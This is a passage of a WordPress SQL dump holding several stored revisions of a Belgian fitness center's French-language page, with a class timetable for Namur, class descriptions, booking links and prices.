corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 07:56:06', '2014-08-31 07:56:06', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(444, 1, '2014-08-31 07:58:24', '2014-08-31 07:58:24', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 07:58:24', '2014-08-31 07:58:24', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(443, 1, '2014-08-31 07:56:42', '2014-08-31 07:56:42', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\n\r\n&nbsp;\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 07:56:42', '2014-08-31 07:56:42', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(453, 1, '2014-08-31 08:32:13', '2014-08-31 08:32:13', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX/Cardio</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\nCircuit Training : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\nCardio : Entraînement développant votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et pour perdre du poids (en complément avec un programme alimentaire) !\r\n\r\nTRX : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\nPsychomotricité : Séance réservée aux enfants de 3 à 6 ans.\r\n\r\nForce : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\nCore : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\nTRX/Cardio : Entraînement croisé entre le TRX et le cardio. Vous travaillerez ici votre endurance et votre renforcement musculaire global.\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:32:13', '2014-08-31 08:32:13', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(451, 1, '2014-08-31 08:19:09', '2014-08-31 08:19:09', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td class=\"tvide\"> - </td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\"> - </td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" 